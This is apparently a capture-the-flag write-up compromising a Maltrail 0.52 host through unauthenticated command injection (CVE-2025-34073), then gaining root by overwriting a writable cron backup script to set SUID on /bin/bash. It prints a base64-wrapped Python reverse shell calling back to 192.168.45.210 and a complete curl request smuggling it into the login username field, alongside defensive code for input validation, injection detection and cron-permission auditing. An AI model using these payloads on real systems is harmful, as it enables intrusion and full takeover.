Enumeration

Nmap

The initial nmap scan revealed that SSH, HTTP and port 8338 were open.

Web Enumeration

The website on port 8338 was Maltrail 0.52.

Exploitation

CVE-2025-34073

An unauthenticated command injection vulnerability exists in stamparm/maltrail (Maltrail) versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint. This occurs due to unsafe handling of user-supplied input passed to subprocess.check_output() in core/http.py, allowing injection of shell metacharacters. Exploitation does not require authentication and commands are executed with the privileges of the Maltrail process.
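The weakness the CVE text describes is the classic CWE-78 pattern: a request parameter spliced into a command string that a shell interprets. The following is an added example, not Maltrail's code and not a reproduction of its core/http.py; the `getent passwd` lookup is a hypothetical stand-in for whatever command the real handler runs. It contrasts the unsafe form with a hardened one (allow-list validation plus an argument list and no shell), and adds a small checker that flags form fields carrying shell metacharacters, which is the kind of rule a WAF or request-log review would use to spot attempts against /login.

```python
import re
import subprocess
from urllib.parse import unquote_plus

# Characters that let shell syntax slip into a command line (CWE-78).
SHELL_META = re.compile(r"[;&|`$(){}<>\\\n\r]")
# Allow-list for a login name (an assumption for this example, not Maltrail's policy).
USERNAME_OK = re.compile(r"[A-Za-z0-9._@-]{1,64}")


def lookup_unsafe(username):
    """Hypothetical CWE-78 pattern: the attacker-controlled string is spliced
    into a command line that /bin/sh interprets, so ';', backticks or '|'
    inside the username become commands. Shown for contrast only; never
    call it with untrusted input."""
    return subprocess.check_output("getent passwd %s" % username, shell=True)


def is_safe_username(username):
    """Allow-list check: True only if the name is made of letters, digits
    and a few punctuation characters, none of which mean anything to a shell."""
    return USERNAME_OK.fullmatch(username) is not None


def lookup_safe(username):
    """Hardened form: validate first, then pass an argument list with no
    shell, so the value reaches getent as one literal argument."""
    if not is_safe_username(username):
        raise ValueError("rejected username: %r" % username)
    result = subprocess.run(["getent", "passwd", username],
                            capture_output=True, check=False)
    return result.stdout


def parse_form(body):
    """Split an application/x-www-form-urlencoded body into {name: [values]}.
    Only '&' separates pairs, so a ';' inside a value stays part of the value
    (older urllib.parse.parse_qs versions also split on ';', which would hide it)."""
    params = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def flag_login_body(body):
    """Return the names of form fields whose (URL-decoded) value carries
    shell metacharacters."""
    return sorted(name for name, values in parse_form(body).items()
                  if any(SHELL_META.search(v) for v in values))


if __name__ == "__main__":
    # Constructed sample bodies: a normal login and an injection attempt
    # shaped like the one in this writeup (PAYLOAD_B64 is a placeholder).
    for body in ("username=admin&password=secret",
                 "username=;`echo PAYLOAD_B64 | base64 -d | sh`&password=x"):
        print(body, "->", flag_login_body(body))
```

The allow-list is deliberately strict; widening it to accept spaces or quotes would be fine with the argument-list form, but the metacharacter rule in `flag_login_body` should then be kept as a separate detection control rather than reused as the validator.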

I found a CVE for this version. All I needed to do was inject a command into the username parameter of the /login endpoint. First I set up a payload as seen below.

echo "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.45.210\",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'" | base64 | tr -d '\n'

echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC40NS4yMTAiLDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIiknCg==' | base64 -d | sh

Then I executed a curl command.

curl 'http://192.168.206.32:8338/login' \
  -X POST \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0' \
  -H 'Accept: text/plain, */*; q=0.01' \
  -H 'Accept-Language: en-US,en;q=0.5' \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Origin: http://192.168.206.32:8338' \
  -H 'Connection: keep-alive' \
  -H 'Referer: http://192.168.206.32:8338/' \
  -H 'Priority: u=0' \
  --data-raw "username=;\`echo \"cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC40NS4yMTAiLDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIiknCg==\" | base64 -d | sh\`"

And I got the user shell.

I read the user flag.

Privilege Escalation

pspy64

I executed pspy64 and found a backup script that was called every minute.

I checked the file and found out I could overwrite it.

So I updated the file to execute chmod +s /bin/bash.

After waiting a minute I got root.
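The root path here is a scheduled job run by root that executes a file a low-privileged user can overwrite. The following is an added example, not code from this writeup or from the target: a small audit that parses an /etc/crontab-style listing and reports every absolute path referenced by a root job that is owned by another user, group- or world-writable, or missing. The crontab text and the `/opt/scripts/backup.sh` path are constructed placeholders, and `make_fake_stat` stands in for `os.stat` so the example runs offline; on a live host you would feed it the real file and `real_stat`.

```python
import os
import stat
from collections import namedtuple

CronEntry = namedtuple("CronEntry", "schedule user command")

# Constructed sample of an /etc/crontab; the backup script path is a
# placeholder, not the one from the target.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    /bin/bash /opt/scripts/backup.sh
"""


def parse_system_crontab(text):
    """Parse /etc/crontab-style lines (five schedule fields, user, command),
    skipping comments, blank lines and VAR=value settings."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)
        if "=" in parts[0] or len(parts) < 7:
            continue
        entries.append(CronEntry(" ".join(parts[:5]), parts[5], parts[6]))
    return entries


def absolute_paths(command):
    """Every token that looks like an absolute path: interpreters, scripts,
    and the files handed to them as arguments."""
    return [tok for tok in command.replace("&&", " ").split() if tok.startswith("/")]


def real_stat(path):
    """(mode, uid) of a real file, for use on a live host."""
    st = os.stat(path)
    return st.st_mode, st.st_uid


def make_fake_stat(table):
    """Offline stand-in for real_stat: table maps path -> (mode, uid);
    anything else is treated as missing."""
    def fake_stat(path):
        if path not in table:
            raise FileNotFoundError(path)
        return table[path]
    return fake_stat


def audit_crontab(text, stat_fn=real_stat, privileged_users=("root",)):
    """Report files used by privileged jobs that someone else could alter:
    owned by a non-root uid, writable by group/others, or missing (anyone
    able to write the parent directory could create them).
    Returns {path: [reasons]}."""
    findings = {}
    for entry in parse_system_crontab(text):
        if entry.user not in privileged_users:
            continue
        for path in absolute_paths(entry.command):
            reasons = []
            try:
                mode, uid = stat_fn(path)
            except FileNotFoundError:
                reasons.append("missing")
            else:
                if uid != 0:
                    reasons.append("owned by uid %d" % uid)
                if mode & stat.S_IWGRP:
                    reasons.append("group-writable")
                if mode & stat.S_IWOTH:
                    reasons.append("world-writable")
            if reasons:
                findings.setdefault(path, []).extend(reasons)
    return findings


if __name__ == "__main__":
    # Constructed filesystem view: the backup script is mode 777 and owned
    # by uid 1000, which is exactly the condition abused in this writeup.
    fake = make_fake_stat({
        "/": (0o40755, 0),
        "/etc/cron.hourly": (0o40755, 0),
        "/bin/bash": (0o100755, 0),
        "/opt/scripts/backup.sh": (0o100777, 1000),
    })
    for path, reasons in audit_crontab(SAMPLE_CRONTAB, fake).items():
        print(path, "->", ", ".join(reasons))
```

The same check is worth running over /etc/cron.d/*, the per-user crontabs under /var/spool/cron, and systemd timer units, since pspy only shows what happens to fire while you are watching.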
